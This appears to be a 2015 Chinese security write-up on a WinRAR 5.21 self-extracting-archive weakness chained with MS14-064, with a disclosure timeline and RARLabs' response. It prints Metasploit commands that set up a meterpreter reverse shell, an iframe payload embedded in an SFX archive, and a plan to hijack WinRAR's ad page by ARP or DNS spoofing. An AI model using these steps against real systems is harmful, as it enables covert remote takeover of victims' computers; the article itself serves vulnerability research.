上月底,WinRAR 5.21被曝出代码执行漏洞,Vulnerability Lab将此漏洞评为高危级,危险系数定为9(满分为10),与此同时安全研究人员Mohammad Reza Espargham发布了PoC,实现了用户打开SFX文件时隐蔽执行攻击代码,但是WinRAR官方RARLabs认为该功能是软件安装必备,没有必要发布任何修复补丁或升级版本。
本以为就此可以跳过该漏洞,但深入研究后发现了更加有趣的事情。
简要介绍一下WinRar 5.21 - SFX OLE 代码执行漏洞
SFX:SelF-eXtracting的缩写,中文翻译自解压文件,是压缩文件的一种,其可以在没有安装压缩软件的情况下执行解压缩
MS14-064:Microsoft Windows OLE远程代码执行漏洞,影响Win95+IE3 – Win10+IE11全版本,实际使用时在win7以上系统由于IE存在沙箱机制,启动白名单以外的进程会弹出提示,如图
sfx文件在创建时支持添加html脚本,但又不会受IE沙箱限制,如果主机存在MS14-064漏洞,在打开包含MS14-064 exp的sfx文件后,即可隐蔽执行任意代码
win7 x86 存在MS14-064漏洞 安装WinRar 5.21
实现相对简单,因此只作简要介绍
(1)搭建server
use exploit/windows/browser/ms14_064_ole_code_execution set payload windows/meterpreter/reverse_tcp set LHOST 192.168.40.131 set LPORT 1234 exploit
如图
(2)生成SFX
选择一个文件右键并添加到压缩文件 选中Create SFX archive 点击Advanced 点击SFX options 点击Text and icon
在Text to display in SFX windows中输入如下代码:
<iframe src="http://192.168.40.131:8080/YrrArF9oTAQ7j"></iframe>
(3)运行sfx文件
双击后meterpreter即上线
Vulnerability Lab和Malwarebytes以及各大网站夸大漏洞危害本就十分有趣,而poc作者的归属又引来了更加有趣的事情。
接下来根据搜集的信息整理出如下时间节点:
文中公开Mohammad Reza Espargham的poc
日期:28/09/2015
相关链接: http://seclists.org/fulldisclosure/2015/Sep/106
限制SFX模块中的HTML功能会影响正常用户使用,而且攻击者仍可利用旧版SFX模块、来自非UnRAR源代码的自定义模块、或者自建代码存档进行攻击 所以RARLabs拒绝为此提供补丁并再次提醒用户,无论任何文件,都应该确认其来源是否可信
相关链接: http://www.rarlab.com/vuln_sfx_html.htm
指出该漏洞夸大其辞毫无意义,建议用户更多去关注windows系统的安全,而不是WinRar软件的本身 在最后提到R-73eN ( RioSherri )举报Mohammad Reza Espargham抄袭其poc代码
相关链接: http://www.rarlab.com/vuln_sfx_html2.htm
(1)R-73eN首发poc
日期:25/09/2015
相关链接: http://0day.today/exploit/24292
(2)Mohammad Reza Espargham随后发布poc
日期:26-09-2015
相关链接: http://cn.0day.today/exploit/24296
日期:30-09-2015
相关链接: http://0day.today/exploit/24326
-试用版WinRaR会弹出提示注册的窗口,该漏洞被利用存在可能 -利用条件: 网络被劫持 未安装MS14-064漏洞补丁 -但是又指出如果满足利用条件,那么系统本身已经不安全,早已超出WinRaR软件自身范畴 -因此拒绝为此漏洞更新补丁
相关链接: http://www.rarlab.com/vuln_web_html.htm
虽然WinRAR(过期通知) OLE远程代码执行漏洞也被RARLabs忽略,但其中的思路很是有趣,当然R-73eN公布的poc需要作部分修改来适用更多winRAR环境
我们在使用WinRAR的时候常常会遇到如下情况:
打开WinRAR时会弹出广告,提示用户付费去掉广告,而不同版本WinRaR广告的链接会存在差异 英文版目前最新为5.30 beta5 中文版目前最新为5.21 英文版广告链接:http://www.win-rar.com/notifier/ 中文版广告链接:http://www.winrar.com.cn/ad/***
WinRAR默认会访问特定网址,如果能够劫持并替换为MS14-064的攻击代码,那么远程执行任意代码不在话下,当然也能逃脱IE沙箱限制
win7 x86 存在MS14-064漏洞 安装WinRar 5.21 cn
(1)搭建server 下载poc,相关链接: http://0day.today/exploit/24326
poc需要作细微修改(此处暂不提供修改方法),执行python脚本,如图
注:如果了解MS14-064漏洞原理,此处修改轻而易举
(2)重定向 http://www.winrar.com.cn
至server ip
可使用arp欺骗和dns欺骗
(3)使用WinRar打开任意文件
默认弹出广告,触发漏洞,弹出计算器,如图
WinRar的漏洞相对较少,但如果结合其他攻击方式能否突破其官方宣称的安全逻辑,值得继续研究。
本文由三好学生原创并首发于乌云drops,转载请注明